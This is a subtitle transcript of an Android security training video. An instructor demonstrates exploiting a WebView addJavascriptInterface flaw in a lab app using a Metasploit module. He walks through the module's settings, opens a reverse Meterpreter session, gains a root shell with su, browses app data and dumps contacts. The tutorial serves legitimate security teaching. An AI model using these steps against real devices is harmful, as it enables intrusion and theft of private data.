1 00:00:00,080 --> 00:00:06,060 - Hello all, and welcome to the new video of Android Security and Exploitation, 2 00:00:06,060 --> 00:00:11,330 training course by PentesterAcademy. My name is Aditya and I'm your course 3 00:00:11,330 --> 00:00:16,540 instructor for this entire training series. So, in this particular video, we 4 00:00:16,540 --> 00:00:22,080 are going to have a look at how we can exploit webview-based vulnerabilities with 5 00:00:22,080 --> 00:00:28,670 Metasploit. So, in case we have a device, and, maybe, an application which is 6 00:00:28,670 --> 00:00:34,520 vulnerable to webview, we can set up a web server, using Metasploit, which, 7 00:00:34,520 --> 00:00:41,740 basically, intercepts the response and adds some malicious component, which gives 8 00:00:41,740 --> 00:00:45,960 you a reverse Meterpreter session (sp). Now, in case you are not familiar with 9 00:00:45,960 --> 00:00:52,900 Metasploit, it's an exploitation framework, by Rapid7. It has a bunch of 10 00:00:52,900 --> 00:00:58,250 different modules, which you can use for exploitation, so you can exploit, maybe, 11 00:00:58,250 --> 00:01:03,260 networks, web applications, or any other component. So, in this case, we're going 12 00:01:03,260 --> 00:01:11,140 to exploit Android applications. Let's start up the Kali VM. In this particular 13 00:01:11,140 --> 00:01:17,360 video, we are going to switch to another VM, which is known as Kali. So, once you 14 00:01:17,360 --> 00:01:22,840 have downloaded and installed the Kali VM, you then simply go and start up 15 00:01:22,840 --> 00:01:30,470 Metasploit, by typing msfconsole. It might take a bit of time for Metasploit to load 16 00:01:30,470 --> 00:01:36,070 up, so let's just wait for a while. I'll just pause the video and start it back 17 00:01:36,070 --> 00:01:44,430 again. Okay, so now that Metasploit has been loaded, we can go ahead and use the 18 00:01:44,430 --> 00:01:49,530 exploit. So, the exploit module, in this case, is 19 00:01:49,530 --> 00:01:59,390 exploit/android/browser/webview_ addjavascriptinterface. We'll just do use 20 00:01:59,390 --> 00:02:06,653 exploit/android/browser/webview_ addjavascriptinterface. Each module 21 00:02:06,653 --> 00:02:12,723 has different options, which you can see by typing show options, right. 22 00:02:13,650 --> 00:02:21,527 in this case, we see that it has several options, like srvhost, srvport, ssl, 23 00:02:21,527 --> 00:02:29,054 uripath, localhost, and localport. So, first of all, let's go ahead and add the 24 00:02:29,054 --> 00:02:34,980 local host, which is our local IP address, which you can find out by typing ifconfig. 25 00:02:36,990 --> 00:02:48,459 So IP address, for us is 192.168.161.134. I'll just do set lhost this particular IP 26 00:02:48,459 --> 00:02:54,526 address, and let's also go ahead and set up a uripath, which is the path of the web 27 00:02:54,526 --> 00:03:00,659 server, to host a malicious content. So let's give it a name vulnerable, right. 28 00:03:00,659 --> 00:03:11,918 Now, let's start up the exploit. So it says that the server has started, at this 29 00:03:11,918 --> 00:03:22,186 particular URL. Let's, first of all, remove the proxy, so that the connection 30 00:03:22,186 --> 00:03:28,461 doesn't get disconnected in the middle. So, I'll just remove the proxy. And now 31 00:03:28,461 --> 00:03:34,527 I'll start a browser, and go to this particular IP address. So it should be 32 00:03:34,527 --> 00:03:47,782 192.168.161.134:8080/vulnerable, right. If you look over here, there will be a 33 00:03:47,782 --> 00:03:55,456 Metasploit Meterpreter session being open. So it sends the payload, and then we have 34 00:03:55,456 --> 00:04:00,440 the final Meterpreter session opened. Now, Meterpreter is one of most amazing 35 00:04:00,440 --> 00:04:06,580 payloads for Metasploit. So, once the session gets open, we can then interact 36 00:04:06,580 --> 00:04:13,270 with the sessions by giving the session id, which, in this case, is 1. So, 37 00:04:13,270 --> 00:04:21,470 once we are into the Meterpreter, we can execute a bunch of different commands. So, 38 00:04:21,470 --> 00:04:26,310 if you just do a ps, it will show you a list of all the running processes, on the 39 00:04:26,310 --> 00:04:33,610 Android device. Right. So, you have the vulnerable.attify.webviewapp and all these 40 00:04:33,610 --> 00:04:39,740 all other applications. You can also type in a question mark, to give you all the 41 00:04:39,740 --> 00:04:46,810 other commands, which you can use. Also, you can type in shell, to get into the 42 00:04:46,810 --> 00:04:52,420 Android shell, and execute commands over there. So, if you type in id now, it will 43 00:04:52,420 --> 00:04:58,260 give you the id, when being run from the Android shell. So, if you also do a su, 44 00:04:58,260 --> 00:05:03,420 which gives you the root privileges, and then do id, you see that you're now a 45 00:05:03,420 --> 00:05:11,260 root, right. And now, you can basically go to any location of any application. So, 46 00:05:11,260 --> 00:05:16,360 let's for this case, go to vulnerable.attify.webview, which is 47 00:05:16,360 --> 00:05:30,100 located at /data/data. And... So it should be webviewapp, let's fix this, right. So, 48 00:05:30,100 --> 00:05:35,300 we have all the files and folders over here. And I can see any information I want 49 00:05:35,300 --> 00:05:42,810 to. Right? So, this is what you can do with webview-based vulnerabilities. Let's 50 00:05:42,810 --> 00:05:49,400 terminate the channel. If the device is vulnerable, you can also dump all this 51 00:05:49,400 --> 00:05:56,180 information. So, if you simply run this, it says, "No contacts found." See. 52 00:05:56,180 --> 00:06:12,430 If any of these actually work. Do I, actually, have contacts on my device? See. 53 00:06:12,430 --> 00:06:24,540 Phone. Contacts. Let's add a contact. And see, if this one actually works. Any 54 00:06:24,540 --> 00:06:36,190 random number. So, it says that the contacts have been dumped. And 55 00:06:36,190 --> 00:06:56,560 ls. Exit. Exit. Sorry. See, and if you do contacts_dump, you'll have the contact 56 00:06:56,560 --> 00:07:02,360 information here. Right. So, this is how you can play around with Metasploit, and 57 00:07:02,360 --> 00:07:07,510 do a lot of different things. Right. So, that's all for this video, and that's all 58 00:07:07,510 --> 00:07:12,930 for webview-based vulnerabilities. It's one of the most critical vulnerabilities, 59 00:07:12,930 --> 00:07:16,960 which you can try to identify and exploit in a lot of new different 60 00:07:16,960 --> 00:07:21,940 Android applications. So, in case if you have any feedback or queries, feel free to 61 00:07:21,940 --> 00:07:28,927 reach out to me @adi1391 on Twitter, or you can mail me at adi@attify.com. 62 00:07:28,927 --> 00:07:30,860 Thanks for watching the video.